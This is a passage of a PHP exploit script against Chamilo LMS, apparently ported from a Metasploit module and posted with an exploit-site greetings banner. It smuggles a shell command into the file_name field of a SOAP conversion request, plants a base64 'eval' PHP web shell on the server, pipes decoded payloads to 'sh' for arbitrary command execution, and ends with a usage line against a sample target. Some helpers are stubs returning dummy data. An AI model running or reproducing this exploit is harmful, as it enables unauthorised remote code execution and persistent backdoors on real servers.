</item>                <item>                    <key xsi:type="xsd:string">file_name</key>                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>                </item>                <item>                    <key xsi:type="xsd:string">service_ppt2lp_size</key>                    <value xsi:type="xsd:string">{$pptSize}</value>                </item>            </param0>        </ns1:wsConvertPpt>    </SOAP-ENV:Body></SOAP-ENV:Envelope>EOS;    }    public function uploadWebshell() {        $this->postParam = bin2hex(random_bytes(4));        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);        if ($pngWebshell === null) {            return null;        }        $payload = base64_encode($pngWebshell);        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    private function injectPhpPayloadPng($phpPayload) {        // Implement your logic to inject PHP payload into a PNG image        // For demonstration purposes, we'll return a dummy PNG data        return pack('H*', '89504E470D0A1A0A...'); // Example PNG header    }    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);        return $response;    }    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -a -d|sh";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    public function check() {        $marker = bin2hex(random_bytes(4));        $res = $this->executeCommand("echo {$marker}");        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit($payload) {        switch ($payload['type']) {            case 'php':                $res = $this->uploadWebshell();                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {                    throw new Exception('Web shell upload error.');                }                $this->executePhp($payload['encoded']);                break;            case 'unix_cmd':                $this->executeCommand($payload['encoded']);                break;            case 'linux_dropper':                // Implement Linux dropper logic                break;        }    }    private function sendRequest($method, $uri, $ctype, $data) {        // Implement your HTTP request logic here (using cURL or similar)        // For demonstration purposes, return a dummy response        return 'Dummy response';    }}// Usage$exploit = new ChamiloExploit('http://target.com', 'webshell.php');$exploit->check();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#linux